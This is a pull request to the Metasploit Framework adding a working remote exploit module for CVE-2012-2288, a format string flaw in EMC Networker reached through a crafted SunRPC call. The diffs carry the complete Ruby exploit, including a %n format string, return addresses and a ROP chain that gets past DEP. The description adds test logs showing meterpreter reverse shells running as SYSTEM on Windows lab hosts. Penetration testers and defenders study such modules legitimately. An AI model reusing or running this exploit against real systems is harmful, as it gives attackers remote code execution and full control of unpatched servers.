### PR TITLE
Added module for CVE-2012-2288 EMC Networker Format String

### DIFF
--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -45,20 +45,29 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        =>
 				[
+					['EMC Networker 7.6 SP3 / Windows Universal',
+						{
+							'Ret' => 0x7c354dac, # ret from MSVCR71.dll
+							'Offset' => 156,
+							'DEP' => true
+						}
+					],
 					['EMC Networker 7.6 SP3 / Windows XP SP3',
 						{
 							'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll
-							'Offset' => 156
+							'Offset' => 156,
+							'DEP' => false
 						}
 					],
 					['EMC Networker 7.6 SP3 / Windows 2003 SP2',
 						{
 							'Ret' => 0x7c354dac, # ret from MSVCR71.dll
-							'Offset' => 156
+							'Offset' => 156,
+							'DEP' => true
 						}
 					]
 				],
-			'DefaultTarget'  => 1,
+			'DefaultTarget'  => 0,
 			'Privileged'     => true,
 			'DisclosureDate' => 'Aug 29 2012'))
 
@@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			fs = "%n" * target['Offset']
 			fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll
-			if target.name =~ /Windows 2003/
+			if target['DEP']
 				rop_gadgets =
 					[
 						# rop chain generated with mona.py

--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -1,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::SunRPC
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EMC Networker Format String',
+			'Description'    => %q{
+					This module exploits a format string vulnerability in the lg_sprintf function
+				as implemented in liblocal.dll on EMC Networker products. This module exploits the
+				vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,
+				version 0x02, and procedure 0x06. This module has been tested successfully on EMC
+				Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
+			},
+			'Author'         =>
+				[
+					'Aaron Portnoy', # Vulnerability Discovery and analysis
+					'Luigi Auriemma <aluigi[at]autistici.org>', # Vulnerability Discovery and analysis
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-2288' ],
+					[ 'OSVDB', '85116' ],
+					[ 'BID', '55330' ],
+					[ 'URL', 'http://blog.exodusintel.com/2012/08/29/when-wrapping-it-up-goes-wrong/' ],
+					[ 'URL', 'http://aluigi.altervista.org/misc/aluigi0216_story.txt' ]
+				],
+			'Platform'       => [ 'win' ],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00\x0d\x0a\x25\x2a",
+					'DisableNops' => true,
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+				},
+			'Targets'        =>
+				[
+					['EMC Networker 7.6 SP3 / Windows XP SP3',
+						{
+							'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll
+							'Offset' => 156
+						}
+					],
+					['EMC Networker 7.6 SP3 / Windows 2003 SP2',
+						{
+							'Ret' => 0x7c354dac, # ret from MSVCR71.dll
+							'Offset' => 156
+						}
+					]
+				],
+			'DefaultTarget'  => 1,
+			'Privileged'     => true,
+			'DisclosureDate' => 'Aug 29 2012'))
+
+	end
+
+	def exploit
+
+		begin
+			if (not sunrpc_create('tcp', 0x5F3DD, 2))
+				fail_with(Exploit::Failure::Unknown, 'sunrpc_create failed')
+			end
+
+			fs = "%n" * target['Offset']
+			fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll
+			if target.name =~ /Windows 2003/
+				rop_gadgets =
+					[
+						# rop chain generated with mona.py
+						0x7c354dab,	# POP EBP # RETN [MSVCR71.dll]
+						0x7c354dab,	# skip 4 bytes [MSVCR71.dll]
+						0x7c37678f,	# POP EAX # RETN [MSVCR71.dll]
+						0xfffffdff,	# Value to negate, will become 0x00000201
+						0x7c34d749,	# NEG EAX # RETN [MSVCR71.dll]
+						0x7c362688,	# POP EBX # RETN [MSVCR71.dll]
+						0xffffffff,	#
+						0x7c345255,	# INC EBX # FPATAN # RETN [MSVCR71.dll]
+						0x7c363cff,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll]
+						0x7c34592b,	# POP EDX # RETN [MSVCR71.dll]
+						0xffffffc0,	# Value to negate, will become 0x00000040
+						0x7c351eb1,	# NEG EDX # RETN [MSVCR71.dll]
+						0x7c37765f,	# POP ECX # RETN [MSVCR71.dll]
+						0x7c38ecfe,	# &Writable location [MSVCR71.dll]
+						0x7c34a490,	# POP EDI # RETN [MSVCR71.dll]
+						0x7c347f98,	# RETN (ROP NOP) [MSVCR71.dll]
+						0x7c364612,	# POP ESI # RETN [MSVCR71.dll]
+						0x7c3415a2,	# JMP [EAX] [MSVCR71.dll]
+						0x7c344cc1,	# POP EAX # RETN [MSVCR71.dll]
+						0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+						0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
+						0x7c345c30,	# ptr to 'push esp #  ret ' [MSVCR71.dll]
+					].pack("V*")
+				fs << rop_gadgets
+			end
+			fs << payload.encoded
+
+			xdr = XDR.encode(0, 2, rand_text_alpha(10), XDR.encode(fs, rand_text_alpha(10)), 2)
+			sunrpc_call(6, xdr)
+			sunrpc_destroy
+
+		rescue Rex::Proto::SunRPC::RPCTimeout
+			print_error('RPCTimeout')
+		rescue EOFError
+			print_error('EOFError')
+		end
+	end
+
+end

--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -86,6 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				rop_gadgets =
 					[
 						# rop chain generated with mona.py
+						# The RopDb mixin isn't used because there are badchars
+						# which must be avoided
 						0x7c354dab,	# POP EBP # RETN [MSVCR71.dll]
 						0x7c354dab,	# skip 4 bytes [MSVCR71.dll]
 						0x7c37678f,	# POP EAX # RETN [MSVCR71.dll]


### PR DESCRIPTION
Tested successfully on EMC Networker 7.6 SP3
- Windows 2003 sp2 (dep bypass)

<pre>
msf  exploit(emc_networker_format_string) > show options

Module options (exploit/windows/emc/emc_networker_format_string):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.172.136  yes       The target address
   RPORT  111              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.129    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   EMC Networker 7.6 SP3 / Windows 2003 SP2


msf  exploit(emc_networker_format_string) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] Sending stage (752128 bytes) to 192.168.1.129
[*] Meterpreter session 4 opened (192.168.1.129:4444 -> 192.168.1.129:64753) at 2012-11-03 18:12:03 +0100

^C[-] Exploit failed: Interrupt 

meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit
</pre>

- Windows XP SP3:

<pre>
msf  exploit(emc_networker_format_string) > set rhost 192.168.1.132
rhost => 192.168.1.132
msf  exploit(emc_networker_format_string) > show options

Module options (exploit/windows/emc/emc_networker_format_string):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.132    yes       The target address
   RPORT  111              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.129    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   EMC Networker 7.6 SP3 / Windows XP SP3

msf  exploit(emc_networker_format_string) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 5 opened (192.168.1.129:4444 -> 192.168.1.132:4618) at 2012-11-03 18:13:07 +0100

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

</pre>
